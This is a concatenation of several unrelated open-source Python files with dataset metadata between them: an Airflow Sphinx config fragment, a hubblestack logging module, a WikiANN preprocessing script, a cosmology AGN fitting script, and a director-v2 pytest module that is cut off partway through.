'google-cloud-storage': ('https://googleapis.dev/python/storage/latest', None),
'google-cloud-tasks': ('https://googleapis.dev/python/cloudtasks/latest', None),
'google-cloud-texttospeech': ('https://googleapis.dev/python/texttospeech/latest', None),
'google-cloud-translate': ('https://googleapis.dev/python/translation/latest', None),
'google-cloud-videointelligence': ('https://googleapis.dev/python/videointelligence/latest', None),
'google-cloud-vision': ('https://googleapis.dev/python/vision/latest', None),
}
# -- Options for sphinx.ext.viewcode -------------------------------------------
# See: https://www.sphinx-doc.org/es/master/usage/extensions/viewcode.html
# If this is True, viewcode extension will emit viewcode-follow-imported event to resolve the name of
# the module by other extensions. The default is True.
viewcode_follow_imported_members = True
# -- Options for sphinx-autoapi ------------------------------------------------
# See: https://sphinx-autoapi.readthedocs.io/en/latest/config.html
# Paths (relative or absolute) to the source code that you wish to generate
# your API documentation from.
autoapi_dirs = [
os.path.abspath('../airflow'),
]
# A directory that has user-defined templates to override our default templates.
autoapi_template_dir = 'autoapi_templates'
# A list of patterns to ignore when finding files
autoapi_ignore = [
'*/airflow/kubernetes/kubernetes_request_factory/*',
'*/_internal*',
'*/airflow/**/providers/**/utils/*',
'*/node_modules/*',
'*/example_dags/*',
'*/migrations/*',
]
# Keep the AutoAPI generated files on the filesystem after the run.
# Useful for debugging.
autoapi_keep_files = True
# Relative path to output the AutoAPI files into. This can also be used to place the generated documentation
# anywhere in your documentation hierarchy.
autoapi_root = '_api'
# -- Options for ext.exampleinclude --------------------------------------------
exampleinclude_sourceroot = os.path.abspath('..')
# -- Options for ext.redirects -------------------------------------------------
redirects_file = 'redirects.txt'
# -- Options for sphinxcontrib.redoc -------------------------------------------
# See: https://sphinxcontrib-redoc.readthedocs.io/en/stable/
OPENAPI_FILE = os.path.join(os.path.dirname(__file__), "..", "airflow", "api_connexion", "openapi", "v1.yaml")
redoc = [
{
'name': 'Airflow REST API',
'page': 'stable-rest-api-ref',
'spec': OPENAPI_FILE,
'opts': {
'hide-hostname': True,
'no-auto-auth': True,
},
},
]
# Options for script updater
redoc_script_url = "https://cdn.jsdelivr.net/npm/redoc@2.0.0-rc.30/bundles/redoc.standalone.js"
| true
| true
|
790c8dc814e7074f4e401866caea91228581eec8
| 6,628
|
py
|
Python
|
hubblestack/log.py
|
instructure/hubble
|
d94ec81f478e3a59611faa0c125fd120e9f43d0b
|
[
"Apache-2.0"
] | 2
|
2019-11-30T19:36:25.000Z
|
2020-09-23T06:28:26.000Z
|
hubblestack/log.py
|
instructure/hubble
|
d94ec81f478e3a59611faa0c125fd120e9f43d0b
|
[
"Apache-2.0"
] | 3
|
2020-08-03T18:14:02.000Z
|
2020-08-03T22:43:44.000Z
|
hubblestack/log.py
|
instructure/hubble
|
d94ec81f478e3a59611faa0c125fd120e9f43d0b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Logging for the hubble daemon
"""
import logging
import time
import hubblestack.splunklogging
# These patterns will not be logged by "conf_publisher" and "emit_to_splunk"
PATTERNS_TO_FILTER = ["password", "token", "passphrase", "privkey",
"keyid", "s3.key", "splunk_token"]
# While hubble doesn't use these, salt modules can, so let's define them anyway
SPLUNK = logging.SPLUNK = 25
PROFILE = logging.PROFILE = 15
TRACE = logging.TRACE = 5
GARBAGE = logging.GARBAGE = 1
QUIET = logging.QUIET = 1000
LOG_LEVELS = {
'all': logging.NOTSET,
'debug': logging.DEBUG,
'error': logging.ERROR,
'critical': logging.CRITICAL,
'garbage': GARBAGE,
'info': logging.INFO,
'profile': PROFILE,
'quiet': QUIET,
'trace': TRACE,
'warning': logging.WARNING,
}
logging.addLevelName(SPLUNK, 'SPLUNK')
logging.addLevelName(QUIET, 'QUIET')
logging.addLevelName(PROFILE, 'PROFILE')
logging.addLevelName(TRACE, 'TRACE')
logging.addLevelName(GARBAGE, 'GARBAGE')
def _splunk(self, message, *args, **kwargs):
    """Log ``message`` at the custom SPLUNK level (25)."""
    if self.isEnabledFor(logging.SPLUNK):
        self._log(logging.SPLUNK, message, args, **kwargs)
def _quiet(self, message, *args, **kwargs):
    """Log ``message`` at the custom QUIET level (1000)."""
    if self.isEnabledFor(logging.QUIET):
        self._log(logging.QUIET, message, args, **kwargs)
def _profile(self, message, *args, **kwargs):
    """Log ``message`` at the custom PROFILE level (15)."""
    if self.isEnabledFor(logging.PROFILE):
        self._log(logging.PROFILE, message, args, **kwargs)
def _trace(self, message, *args, **kwargs):
    """Log ``message`` at the custom TRACE level (5)."""
    if self.isEnabledFor(logging.TRACE):
        self._log(logging.TRACE, message, args, **kwargs)
def _garbage(self, message, *args, **kwargs):
    """Log ``message`` at the custom GARBAGE level (1)."""
    if self.isEnabledFor(logging.GARBAGE):
        self._log(logging.GARBAGE, message, args, **kwargs)
logging.Logger.splunk = _splunk
logging.Logger.quiet = _quiet
logging.Logger.profile = _profile
logging.Logger.trace = _trace
logging.Logger.garbage = _garbage
SPLUNK_HANDLER = None
class MockRecord(object):
    """Minimal stand-in for a ``logging`` record.

    Carries only the attributes the Splunk handler reads: the message
    payload, the level name, a pre-formatted timestamp, and the logger
    name.  No formatting or validation is performed.
    """

    def __init__(self, message, levelname, asctime, name):
        self.message, self.levelname = message, levelname
        self.asctime, self.name = asctime, name
# Set up an early log handler for use while we're generating config.
# Will be removed when we set up the console or file logger.
TEMP_HANDLER = logging.StreamHandler()
TEMP_HANDLER.setLevel(logging.INFO)
TEMP_HANDLER.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s'))
logging.root.handlers.insert(0, TEMP_HANDLER)
def _remove_temp_handler():
    """Detach the bootstrap log handler from the root logger, if attached."""
    root_handlers = logging.root.handlers
    if TEMP_HANDLER and TEMP_HANDLER in root_handlers:
        root_handlers.remove(TEMP_HANDLER)
def setup_console_logger(log_level='error',
                         log_format='%(asctime)s [%(levelname)-5s] %(message)s',
                         date_format='%H:%M:%S'):
    """Attach a STDERR stream handler to the root logger.

    Level, message format, and date format are all configurable; an
    unrecognized ``log_level`` name falls back to ERROR.  The temporary
    bootstrap handler is removed first.
    """
    _remove_temp_handler()
    console_handler = logging.StreamHandler()
    console_handler.setLevel(LOG_LEVELS.get(log_level, logging.ERROR))
    console_handler.setFormatter(logging.Formatter(log_format, date_format))
    logging.getLogger().addHandler(console_handler)
def setup_file_logger(log_file,
                      log_level='error',
                      log_format='%(asctime)s,%(msecs)03d [%(levelname)-5s] [%(name)s:%(lineno)d] '
                                 ' %(message)s',
                      date_format='%Y-%m-%d %H:%M:%S',
                      max_bytes=100000000,
                      backup_count=1):
    """
    Sets up logging to a file. By default will auto-rotate those logs every
    100MB and keep one backup.
    """
    # ``import logging`` alone does not guarantee the ``logging.handlers``
    # submodule attribute exists; import it explicitly instead of relying
    # on some other module having imported it first.
    import logging.handlers
    _remove_temp_handler()
    rootlogger = logging.getLogger()
    handler = logging.handlers.RotatingFileHandler(log_file, maxBytes=max_bytes,
                                                   backupCount=backup_count)
    # Unrecognized level names fall back to ERROR.
    handler.setLevel(LOG_LEVELS.get(log_level, logging.ERROR))
    formatter = logging.Formatter(log_format, date_format)
    handler.setFormatter(formatter)
    rootlogger.addHandler(handler)
def setup_splunk_logger():
    """
    Sets up logging to splunk.
    """
    _remove_temp_handler()
    rootlogger = logging.getLogger()
    handler = hubblestack.splunklogging.SplunkHandler()
    # Only records at the custom SPLUNK level (25) or above reach Splunk.
    handler.setLevel(logging.SPLUNK)
    rootlogger.addHandler(handler)
    # Remember the handler so emit_to_splunk() can send records directly.
    global SPLUNK_HANDLER
    SPLUNK_HANDLER = handler
def emit_to_splunk(message, level, name):
    """Send a single record straight to the Splunk handler.

    List/dict payloads are scrubbed of sensitive keys first.  Returns
    True on success, or False when the Splunk logger has not been set
    up yet (string payloads are passed through unfiltered).
    """
    if isinstance(message, (list, dict)):
        message = filter_logs(message, remove_dots=False)
    if SPLUNK_HANDLER is None:
        return False
    SPLUNK_HANDLER.emit(MockRecord(message, level, time.asctime(), name))
    return True
def workaround_salt_log_handler_queues():
    """
    Build a fake log handler and add it to LOGGING_STORE_HANDLER and LOGGING_NULL_HANDLER
    """
    class _FakeLogHandler(object):
        # Minimal object exposing the attributes/methods salt's queue
        # handlers expect: a numeric level and a handle() callable.
        level = 10
        count = 0
        def handle(self, _record):
            """ Receive a record and increase the count """
            self.count += 1
    flh = _FakeLogHandler()
    # Imported lazily so this module loads even when salt is unavailable.
    import salt.log.setup as sls
    # Drain salt's queued log records into the no-op handler so they do
    # not accumulate in memory.
    sls.LOGGING_STORE_HANDLER.sync_with_handlers([flh])
    sls.LOGGING_NULL_HANDLER.sync_with_handlers([flh])
    # if flh.count > 0:
    #     log.info("pretended to handle %d logging record(s)
    #         for salt.log.setup.LOGGING_*_HANDLER", flh.count)
def filter_logs(opts_to_log, remove_dots=True):
    """
    Filters out keys containing certain patterns to avoid sensitive information being sent to logs

    Works on dictionaries and lists

    This function was located at extmods/modules/conf_publisher.py previously

    :param opts_to_log: dict (or list) to scrub of sensitive entries
    :param remove_dots: when True, rewrite remaining top-level keys so
        dots become underscores; assumes a dict input in that case
    :return: the filtered (and possibly re-keyed) structure
    """
    filtered_conf = _remove_sensitive_info(opts_to_log, PATTERNS_TO_FILTER)
    if remove_dots:
        # Iterate over a snapshot of the keys: popping and inserting while
        # iterating the live keys view can raise RuntimeError or skip keys.
        for key in list(filtered_conf.keys()):
            if '.' in key:
                filtered_conf[key.replace('.', '_')] = filtered_conf.pop(key)
    return filtered_conf
def _remove_sensitive_info(obj, patterns_to_filter):
"""
Filter known sensitive info
"""
if isinstance(obj, dict):
obj = {
key: _remove_sensitive_info(value, patterns_to_filter)
for key, value in obj.items()
if not any(patt in key for patt in patterns_to_filter)}
elif isinstance(obj, list):
obj = [_remove_sensitive_info(item, patterns_to_filter)
for item in obj]
return obj
| 28.943231
| 99
| 0.664152
|
import logging
import time
import hubblestack.splunklogging
PATTERNS_TO_FILTER = ["password", "token", "passphrase", "privkey",
"keyid", "s3.key", "splunk_token"]
SPLUNK = logging.SPLUNK = 25
PROFILE = logging.PROFILE = 15
TRACE = logging.TRACE = 5
GARBAGE = logging.GARBAGE = 1
QUIET = logging.QUIET = 1000
LOG_LEVELS = {
'all': logging.NOTSET,
'debug': logging.DEBUG,
'error': logging.ERROR,
'critical': logging.CRITICAL,
'garbage': GARBAGE,
'info': logging.INFO,
'profile': PROFILE,
'quiet': QUIET,
'trace': TRACE,
'warning': logging.WARNING,
}
logging.addLevelName(SPLUNK, 'SPLUNK')
logging.addLevelName(QUIET, 'QUIET')
logging.addLevelName(PROFILE, 'PROFILE')
logging.addLevelName(TRACE, 'TRACE')
logging.addLevelName(GARBAGE, 'GARBAGE')
def _splunk(self, message, *args, **kwargs):
if self.isEnabledFor(logging.SPLUNK):
self._log(logging.SPLUNK, message, args, **kwargs)
def _quiet(self, message, *args, **kwargs):
if self.isEnabledFor(logging.QUIET):
self._log(logging.QUIET, message, args, **kwargs)
def _profile(self, message, *args, **kwargs):
if self.isEnabledFor(logging.PROFILE):
self._log(logging.PROFILE, message, args, **kwargs)
def _trace(self, message, *args, **kwargs):
if self.isEnabledFor(logging.TRACE):
self._log(logging.TRACE, message, args, **kwargs)
def _garbage(self, message, *args, **kwargs):
if self.isEnabledFor(logging.GARBAGE):
self._log(logging.GARBAGE, message, args, **kwargs)
logging.Logger.splunk = _splunk
logging.Logger.quiet = _quiet
logging.Logger.profile = _profile
logging.Logger.trace = _trace
logging.Logger.garbage = _garbage
SPLUNK_HANDLER = None
class MockRecord(object):
def __init__(self, message, levelname, asctime, name):
self.message = message
self.levelname = levelname
self.asctime = asctime
self.name = name
# Will be removed when we set up the console or file logger.
TEMP_HANDLER = logging.StreamHandler()
TEMP_HANDLER.setLevel(logging.INFO)
TEMP_HANDLER.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s'))
logging.root.handlers.insert(0, TEMP_HANDLER)
def _remove_temp_handler():
if TEMP_HANDLER and TEMP_HANDLER in logging.root.handlers:
logging.root.handlers.remove(TEMP_HANDLER)
def setup_console_logger(log_level='error',
log_format='%(asctime)s [%(levelname)-5s] %(message)s',
date_format='%H:%M:%S'):
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(LOG_LEVELS.get(log_level, logging.ERROR))
formatter = logging.Formatter(log_format, date_format)
handler.setFormatter(formatter)
rootlogger.addHandler(handler)
def setup_file_logger(log_file,
log_level='error',
log_format='%(asctime)s,%(msecs)03d [%(levelname)-5s] [%(name)s:%(lineno)d] '
' %(message)s',
date_format='%Y-%m-%d %H:%M:%S',
max_bytes=100000000,
backup_count=1):
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = logging.handlers.RotatingFileHandler(log_file, maxBytes=max_bytes,
backupCount=backup_count)
handler.setLevel(LOG_LEVELS.get(log_level, logging.ERROR))
formatter = logging.Formatter(log_format, date_format)
handler.setFormatter(formatter)
rootlogger.addHandler(handler)
def setup_splunk_logger():
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = hubblestack.splunklogging.SplunkHandler()
handler.setLevel(logging.SPLUNK)
rootlogger.addHandler(handler)
global SPLUNK_HANDLER
SPLUNK_HANDLER = handler
def emit_to_splunk(message, level, name):
if isinstance(message, (list, dict)):
message = filter_logs(message, remove_dots=False)
if SPLUNK_HANDLER is None:
return False
handler = SPLUNK_HANDLER
handler.emit(MockRecord(message, level, time.asctime(), name))
return True
def workaround_salt_log_handler_queues():
class _FakeLogHandler(object):
level = 10
count = 0
def handle(self, _record):
self.count += 1
flh = _FakeLogHandler()
import salt.log.setup as sls
sls.LOGGING_STORE_HANDLER.sync_with_handlers([flh])
sls.LOGGING_NULL_HANDLER.sync_with_handlers([flh])
# if flh.count > 0:
# log.info("pretended to handle %d logging record(s)
# for salt.log.setup.LOGGING_*_HANDLER", flh.count)
def filter_logs(opts_to_log, remove_dots=True):
filtered_conf = _remove_sensitive_info(opts_to_log, PATTERNS_TO_FILTER)
if remove_dots:
for key in filtered_conf.keys():
if '.' in key:
filtered_conf[key.replace('.', '_')] = filtered_conf.pop(key)
return filtered_conf
def _remove_sensitive_info(obj, patterns_to_filter):
if isinstance(obj, dict):
obj = {
key: _remove_sensitive_info(value, patterns_to_filter)
for key, value in obj.items()
if not any(patt in key for patt in patterns_to_filter)}
elif isinstance(obj, list):
obj = [_remove_sensitive_info(item, patterns_to_filter)
for item in obj]
return obj
| true
| true
|
790c8de998b51f0c481a10acc216410fd391a3c0
| 502
|
py
|
Python
|
Fine-tuning/Utility Files/wikiann_preprocessor.py
|
Vaidehi99/OBPE
|
e844c3268d3d698eeca96cd2646441601474155b
|
[
"Apache-2.0"
] | null | null | null |
Fine-tuning/Utility Files/wikiann_preprocessor.py
|
Vaidehi99/OBPE
|
e844c3268d3d698eeca96cd2646441601474155b
|
[
"Apache-2.0"
] | null | null | null |
Fine-tuning/Utility Files/wikiann_preprocessor.py
|
Vaidehi99/OBPE
|
e844c3268d3d698eeca96cd2646441601474155b
|
[
"Apache-2.0"
] | null | null | null |
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--infile", default=None, type=str, required=True, help="path of input file to preprocess")
parser.add_argument("--outfile", default=None, type=str, required=True, help="output file path")
args = parser.parse_args()

# Convert WikiANN-style lines ("token ... tag") to two-column
# "token<TAB>tag" format, preserving blank lines as sentence separators.
# Context managers close both files even on error (the originals leaked).
with open(args.infile, 'r') as infile, open(args.outfile, 'w') as outfile:
    for line in infile:
        # Blank/whitespace-only lines separate sentences.  The original
        # test ``len(line.split(' ')) == 0`` was dead code: str.split
        # always returns at least one element, so separator lines were
        # emitted as garbage instead of a bare newline.
        if not line.strip():
            outfile.write('\n')
        else:
            fields = line.split(' ')
            outfile.write(fields[0] + '\t' + fields[-1])
| 31.375
| 111
| 0.699203
|
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--infile", default=None, type=str, required=True, help="path of input file to preprocess")
parser.add_argument("--outfile", default=None, type=str, required=True,help="output file path")
args = parser.parse_args()
lines=open(args.infile,'r').readlines()
outfile=open(args.outfile,'w')
for line in lines:
if(len(line.split(' '))==0):
outfile.write('\n')
else:
outfile.write(line.split(' ')[0]+'\t'+line.split(' ')[-1])
| true
| true
|
790c8eadf2fdde222a7edbfa4ff632907727f155
| 2,970
|
py
|
Python
|
Software/Funcionales/funciones_LambdaCDM_AGN.py
|
matiasleize/tesis_licenciatura
|
5df6e341314583702b466b8ed7977d410f0ee457
|
[
"MIT"
] | null | null | null |
Software/Funcionales/funciones_LambdaCDM_AGN.py
|
matiasleize/tesis_licenciatura
|
5df6e341314583702b466b8ed7977d410f0ee457
|
[
"MIT"
] | null | null | null |
Software/Funcionales/funciones_LambdaCDM_AGN.py
|
matiasleize/tesis_licenciatura
|
5df6e341314583702b466b8ed7977d410f0ee457
|
[
"MIT"
] | null | null | null |
"""
Created on Sun Feb 2 13:28:48 2020
@author: matias
"""
import numpy as np
from numpy.linalg import inv
from matplotlib import pyplot as plt
import time
import camb
from scipy.integrate import cumtrapz as cumtrapz
from scipy.integrate import simps as simps
from scipy.interpolate import interp1d
from scipy.constants import c as c_luz #metros/segundos
c_luz_km = c_luz/1000
import sys
import os
from os.path import join as osjoin
from pc_path import definir_path
path_git, path_datos_global = definir_path()
os.chdir(path_git)
sys.path.append('./Software/Funcionales/')
from funciones_int import Hubble_teorico
from funciones_AGN import zs_2_logDlH0
#%%
'''
DEPRECATED: Antes de eliminar este archivo copiar este ejemplo en otro .py
en donde se grafiquen los datos.
'''
if __name__ == '__main__':
from scipy.constants import c as c_luz #metros/segundos
from matplotlib import pyplot as plt
import sys
import os
from os.path import join as osjoin
from pc_path import definir_path
path_git, path_datos_global = definir_path()
os.chdir(path_git)
sys.path.append('./Software/Funcionales/')
from funciones_data import leer_data_AGN
#%%
    def leer_data_AGN(archivo_AGN):
        """Read the AGN data table and return its columns sorted by redshift.

        Columns 3-7 of *archivo_AGN* are (z, Fuv, eFuv, Fx, eFx); all five
        arrays are reordered together by increasing z.
        """
        z, Fuv, eFuv, Fx, eFx = np.loadtxt(archivo_AGN,
                                    usecols=(3,4,5,6,7), unpack=True)
        # Sort every column by the redshift ordering so rows stay aligned.
        arr1inds = z.argsort()
        sorted_z = z[arr1inds]
        sorted_Fuv = Fuv[arr1inds]
        sorted_eFuv = eFuv[arr1inds]
        sorted_Fx = Fx[arr1inds]
        sorted_eFx = eFx[arr1inds]
        return sorted_z, sorted_Fuv, sorted_eFuv, sorted_Fx, sorted_eFx
#Data AGN
os.chdir(path_git+'/Software/Estadística/Datos/Datos_AGN')
data_agn = leer_data_AGN('table3.dat')
H_0 = 70
omega_m = 0.99
gamma = 0.64
beta = 7
delta = 0.3
theta = [omega_m,beta,gamma,delta]
#params_to_chi2_AGN_nuisance(theta, _, data_agn)/(len(z_data)-4)
data_agn = leer_data_AGN('table3.dat')
z_data_1, logFuv_1, eFuv_1, logFx_1, eFx_1 = data_agn
zmin = 0
zmax = 100
mask = (z_data_1 > zmin) & (z_data_1 < zmax)
z_data = z_data_1[mask]
logFuv = logFuv_1[mask]
logFx = logFx_1[mask]
eFx = eFx_1[mask]
eFuv = eFuv_1[mask]
zs_modelo = np.linspace(0,30,10**6)
Dl_teo = -np.log10(H_0) + zs_2_logDlH0(zs_modelo,omega_m,z_data)
Dl_teo_cm = Dl_teo - np.log10(3.24) + 25
psi = beta + gamma * logFuv + 2 * (gamma-1) * (Dl_teo_cm + 0.5 * np.log10(4*np.pi))
si_2 = eFx**2 + (gamma * eFuv)**2 + np.exp(2*np.log(delta)) #El cuadrado de los errores
#si_2 = eFx**2 + (gamma * eFuv)**2 + delta**2 #El cuadrado de los errores
print(np.sum(si_2))
chi2_AGN = np.sum( ((logFx-psi)**2/si_2) + np.log(2*np.pi*si_2)) # menos en el paper
print(chi2_AGN)
print(chi2_AGN/(len(z_data)-4))
plt.figure()
plt.xlabel('z (redshift)')
plt.ylabel(r'$Fx$')
plt.errorbar(z_data,psi,np.sqrt(si_2),marker='.',linestyle='')
plt.plot(z_data,logFx,'.r')
| 28.557692
| 91
| 0.676431
|
import numpy as np
from numpy.linalg import inv
from matplotlib import pyplot as plt
import time
import camb
from scipy.integrate import cumtrapz as cumtrapz
from scipy.integrate import simps as simps
from scipy.interpolate import interp1d
from scipy.constants import c as c_luz
c_luz_km = c_luz/1000
import sys
import os
from os.path import join as osjoin
from pc_path import definir_path
path_git, path_datos_global = definir_path()
os.chdir(path_git)
sys.path.append('./Software/Funcionales/')
from funciones_int import Hubble_teorico
from funciones_AGN import zs_2_logDlH0
if __name__ == '__main__':
from scipy.constants import c as c_luz
from matplotlib import pyplot as plt
import sys
import os
from os.path import join as osjoin
from pc_path import definir_path
path_git, path_datos_global = definir_path()
os.chdir(path_git)
sys.path.append('./Software/Funcionales/')
from funciones_data import leer_data_AGN
def leer_data_AGN(archivo_AGN):
z, Fuv, eFuv, Fx, eFx = np.loadtxt(archivo_AGN,
usecols=(3,4,5,6,7), unpack=True)
arr1inds = z.argsort()
sorted_z = z[arr1inds]
sorted_Fuv = Fuv[arr1inds]
sorted_eFuv = eFuv[arr1inds]
sorted_Fx = Fx[arr1inds]
sorted_eFx = eFx[arr1inds]
return sorted_z, sorted_Fuv, sorted_eFuv, sorted_Fx, sorted_eFx
os.chdir(path_git+'/Software/Estadística/Datos/Datos_AGN')
data_agn = leer_data_AGN('table3.dat')
H_0 = 70
omega_m = 0.99
gamma = 0.64
beta = 7
delta = 0.3
theta = [omega_m,beta,gamma,delta]
data_agn = leer_data_AGN('table3.dat')
z_data_1, logFuv_1, eFuv_1, logFx_1, eFx_1 = data_agn
zmin = 0
zmax = 100
mask = (z_data_1 > zmin) & (z_data_1 < zmax)
z_data = z_data_1[mask]
logFuv = logFuv_1[mask]
logFx = logFx_1[mask]
eFx = eFx_1[mask]
eFuv = eFuv_1[mask]
zs_modelo = np.linspace(0,30,10**6)
Dl_teo = -np.log10(H_0) + zs_2_logDlH0(zs_modelo,omega_m,z_data)
Dl_teo_cm = Dl_teo - np.log10(3.24) + 25
psi = beta + gamma * logFuv + 2 * (gamma-1) * (Dl_teo_cm + 0.5 * np.log10(4*np.pi))
si_2 = eFx**2 + (gamma * eFuv)**2 + np.exp(2*np.log(delta))
chi2_AGN = np.sum( ((logFx-psi)**2/si_2) + np.log(2*np.pi*si_2))
print(chi2_AGN)
print(chi2_AGN/(len(z_data)-4))
plt.figure()
plt.xlabel('z (redshift)')
plt.ylabel(r'$Fx$')
plt.errorbar(z_data,psi,np.sqrt(si_2),marker='.',linestyle='')
plt.plot(z_data,logFx,'.r')
| true
| true
|
790c8fb53feaa528655dc48d7224c7c5ffda0117
| 7,725
|
py
|
Python
|
services/director-v2/tests/unit/test_modules_director_v0.py
|
GitHK/osparc-simcore-forked
|
5b01a28d1b8028afcf9a735e1d46a73daa13686e
|
[
"MIT"
] | null | null | null |
services/director-v2/tests/unit/test_modules_director_v0.py
|
GitHK/osparc-simcore-forked
|
5b01a28d1b8028afcf9a735e1d46a73daa13686e
|
[
"MIT"
] | 17
|
2020-10-15T16:06:05.000Z
|
2022-03-21T18:48:21.000Z
|
services/director-v2/tests/unit/test_modules_director_v0.py
|
GitHK/osparc-simcore-forked
|
5b01a28d1b8028afcf9a735e1d46a73daa13686e
|
[
"MIT"
] | null | null | null |
# pylint:disable=unused-variable
# pylint:disable=unused-argument
# pylint:disable=redefined-outer-name
# pylint:disable=protected-access
import json
import re
import urllib.parse
from collections import namedtuple
from pathlib import Path
from random import randint
from typing import Callable, List
from uuid import uuid4
import pytest
import respx
from fastapi import FastAPI, status
from models_library.services import ServiceDockerData, ServiceKeyVersion
from simcore_service_director_v2.models.schemas.services import (
RunningServiceDetails,
ServiceExtras,
)
from simcore_service_director_v2.modules.director_v0 import DirectorV0Client
@pytest.fixture(autouse=True)
def minimal_director_config(project_env_devel_environment, monkeypatch):
    """set a minimal configuration for testing the director connection only"""
    # Enable only the director client; disable every other subsystem so
    # the app can start without a database, broker, or registry.
    monkeypatch.setenv("DIRECTOR_ENABLED", "1")
    monkeypatch.setenv("POSTGRES_ENABLED", "0")
    monkeypatch.setenv("CELERY_ENABLED", "0")
    monkeypatch.setenv("REGISTRY_ENABLED", "0")
@pytest.fixture
def mocked_director_v0_service_api(minimal_app, entrypoint, exp_data, resp_alias):
with respx.mock(
base_url=minimal_app.state.settings.director_v0.base_url(include_tag=False),
assert_all_called=False,
assert_all_mocked=True,
) as respx_mock:
# lists services
respx_mock.get(
urllib.parse.unquote(entrypoint),
content=exp_data,
alias=resp_alias,
)
yield respx_mock
ForwardToDirectorParams = namedtuple(
"ForwardToDirectorParams", "entrypoint,exp_status,exp_data,resp_alias"
)
def _get_list_services_calls() -> List[ForwardToDirectorParams]:
return [
ForwardToDirectorParams(
entrypoint="/v0/services",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_all_services",
),
ForwardToDirectorParams(
entrypoint="/v0/services?service_type=computational",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_computational_services",
),
ForwardToDirectorParams(
entrypoint="/v0/services?service_type=dynamic",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_dynamic_services",
),
]
def _get_service_version_calls() -> List[ForwardToDirectorParams]:
# TODO: here we see the return value is currently not validated
return [
ForwardToDirectorParams(
entrypoint="/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["stuff about my service"]},
resp_alias="get_service_version",
)
]
def _get_service_version_extras_calls() -> List[ForwardToDirectorParams]:
    """Case for fetching a service's extras.

    NOTE: the payload is opaque here — the forwarding test does not validate it.
    """
    call = ForwardToDirectorParams(
        entrypoint="/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4/extras",
        exp_status=status.HTTP_200_OK,
        exp_data={"data": "extra stuff about my service"},
        resp_alias="get_service_extras",
    )
    return [call]
@pytest.mark.parametrize(
    "entrypoint,exp_status,exp_data,resp_alias",
    _get_list_services_calls()
    + _get_service_version_calls()
    + _get_service_version_extras_calls(),
)
def test_forward_to_director(
    client, mocked_director_v0_service_api, entrypoint, exp_status, exp_data, resp_alias
):
    """Each GET entrypoint is forwarded to director-v0 and its response
    (status and body) is returned to the caller unchanged."""
    response = client.get(entrypoint)
    assert response.status_code == exp_status
    assert response.json() == exp_data
    # the aliased respx route must have been hit — proof the forward happened
    assert mocked_director_v0_service_api[resp_alias].called
@pytest.fixture(scope="session")
def fake_service_details(mocks_dir: Path) -> ServiceDockerData:
    """Service description loaded from the mocks directory (session-wide)."""
    mock_file = mocks_dir / "fake_service.json"
    assert mock_file.exists()
    return ServiceDockerData(**json.loads(mock_file.read_text()))
@pytest.fixture
def fake_service_extras(random_json_from_schema: Callable) -> ServiceExtras:
    """Random service extras generated from the model's own JSON schema."""
    schema = ServiceExtras.schema_json(indent=2)
    return ServiceExtras(**random_json_from_schema(schema))
@pytest.fixture
def fake_running_service_details(
    random_json_from_schema: Callable,
) -> RunningServiceDetails:
    """Random running-service details with valid (positive) port numbers."""
    payload = random_json_from_schema(RunningServiceDetails.schema_json(indent=2))
    # the randomiser does not honour positive-int constraints, so patch the ports
    for port_key in ("published_port", "service_port"):
        if port_key in payload:
            payload[port_key] = randint(1, 50000)
    return RunningServiceDetails(**payload)
@pytest.fixture
def mocked_director_service_fcts(
    minimal_app: FastAPI,
    fake_service_details: ServiceDockerData,
    fake_service_extras: ServiceExtras,
    fake_running_service_details: RunningServiceDetails,
):
    """Mock the three director-v0 endpoints the DirectorV0Client calls:
    service details, service extras, and running-service details.

    Each route is aliased so tests can assert `respx_mock[alias].called`.
    """
    with respx.mock(
        base_url=minimal_app.state.settings.director_v0.base_url(include_tag=False),
        assert_all_called=False,
        assert_all_mocked=True,
    ) as respx_mock:
        # fixed key/version; payload wraps the fake model dump in a list
        respx_mock.get(
            "/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
            content={"data": [fake_service_details.dict(by_alias=True)]},
            alias="get_service_version",
        )
        respx_mock.get(
            "/v0/service_extras/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
            content={"data": fake_service_extras.dict(by_alias=True)},
            alias="get_service_extras",
        )
        # matches any node uuid (hyphens optional) at the end of the path
        pattern = re.compile(
            r"v0/running_interactive_services/[0-9a-fA-F]{8}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{12}$"
        )
        respx_mock.get(
            pattern,
            content={"data": fake_running_service_details.dict(by_alias=True)},
            alias="get_running_service_details",
        )
        yield respx_mock
async def test_get_service_details(
    minimal_app: FastAPI,
    mocked_director_service_fcts,
    fake_service_details: ServiceDockerData,
):
    """The client fetches and parses service details from director-v0."""
    director_client: DirectorV0Client = minimal_app.state.director_v0_client
    requested_service = ServiceKeyVersion(
        key="simcore/services/dynamic/myservice", version="1.3.4"
    )

    details = await director_client.get_service_details(requested_service)

    assert mocked_director_service_fcts["get_service_version"].called
    assert details == fake_service_details
async def test_get_service_extras(
    minimal_app: FastAPI,
    mocked_director_service_fcts,
    fake_service_extras: ServiceExtras,
):
    """The client fetches and parses service extras from director-v0."""
    director_client: DirectorV0Client = minimal_app.state.director_v0_client
    requested_service = ServiceKeyVersion(
        key="simcore/services/dynamic/myservice", version="1.3.4"
    )

    extras = await director_client.get_service_extras(requested_service)

    assert mocked_director_service_fcts["get_service_extras"].called
    assert extras == fake_service_extras
async def test_get_running_service_details(
    minimal_app: FastAPI,
    mocked_director_service_fcts,
    fake_running_service_details: RunningServiceDetails,
):
